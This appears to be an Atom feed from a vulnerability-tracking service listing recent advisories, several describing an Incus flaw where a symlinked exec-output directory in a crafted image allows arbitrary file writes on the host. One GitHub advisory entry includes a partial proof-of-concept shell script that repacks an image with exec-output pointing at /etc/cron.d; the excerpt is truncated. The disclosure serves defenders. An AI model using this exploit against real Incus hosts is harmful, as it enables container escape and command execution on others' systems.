<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-04T13:32:46.901126+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-15481</id>
    <title>bdu:2026-15481</title>
    <updated>2026-10-04T13:32:46.990472+00:00</updated>
    <content>bdu:2026-15481</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-15481"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-359371</id>
    <title>EUVD-2026-359371</title>
    <updated>2026-10-04T13:32:46.990511+00:00</updated>
    <content>EUVD-2026-359371</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-359371"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-48750</id>
    <title>fkie_cve-2026-48750</title>
    <updated>2026-10-04T13:32:46.990526+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-48750"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-73hr-m85f-64v9</id>
    <title>GHSA-73hr-m85f-64v9 — Incus has an arbitrary file write on host via `exec-output` symlink in crafted image</title>
    <updated>2026-10-04T13:32:46.990559+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/lxc/incus/v7/cmd/incusd</p>
<p>### Summary</p>
<p>The `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution.</p>
<p>### Details</p>
<p>When an image is unpacked, top-level symlinks are extracted as is; allowing for `exec-output` to be placed on disk. In `instance_exec.go`, `os.Mkdir` continues of `exec-output` exists and `os.OpenFile` follows the `exec-output` symlink.</p>
<p>### PoC</p>
<p>Below, we place the `exec_UUID.stdout` file in `/etc/cron.d` on
the host for arbitrary command execution.</p>
<p>```
#!/bin/sh
# usage: $0 existing-imagefp
set -eu</p>
<p>basefp="${1}"</p>
<p>die() {
        printf '%s' "${@}" &gt;&amp;2
        exit 1
}</p>
<p>command -v curl &gt;/dev/null 2&gt;&amp;1 || die 'error: curl not found\n'
command -v python3 &gt;/dev/null 2&gt;&amp;1 || die 'error: python3 not found\n'</p>
<p>tmpdir=$(mktemp -d)
cleanup() {
        rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP</p>
<p># insert exec-output symlink</p>
<p>incus image export "${basefp}" "${tmpdir}/img"</p>
<p>mkdir "${tmpdir}/repack"
cd "${tmpdir}/repack"</p>
<p>xz -cd "${tmpdir}/img" | tar -f- -vx</p>
<p>rm -rf exec-output
ln -s /etc/cron.d exec-output</p>
<p>tar -f- -c * | gzip -c9 &gt;"${tmpdir}/img"</p>
<p>cd - &gt;/dev/null
incus image import "${tmpdir}"/img* --alias afw-exec-output</p>
<p># Launch container, exec with…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-73hr-m85f-64v9"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2026:11651-1</id>
    <title>openSUSE-SU-2026:11651-1 — incus-7.4-1.1 on GA media</title>
    <updated>2026-10-04T13:32:46.990618+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>incus-7.4-1.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2026:11651-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48750</id>
    <title>UBUNTU-CVE-2026-48750</title>
    <updated>2026-10-04T13:32:46.990644+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:Pro:16.04:LTS: lxd, Ubuntu:Pro:18.04:LTS: lxd, Ubuntu:20.04:LTS: lxd, Ubuntu:Pro:24.04:LTS: incus, Ubuntu:25.10: incus, Ubuntu:Pro:26.04:LTS: incus</p>
<p>Incus is a system container and virtual machine manager. Prior to version 7.2.0, the `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution. Version 7.2.0 contains a patch.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48750"/>
  </entry>
</feed>
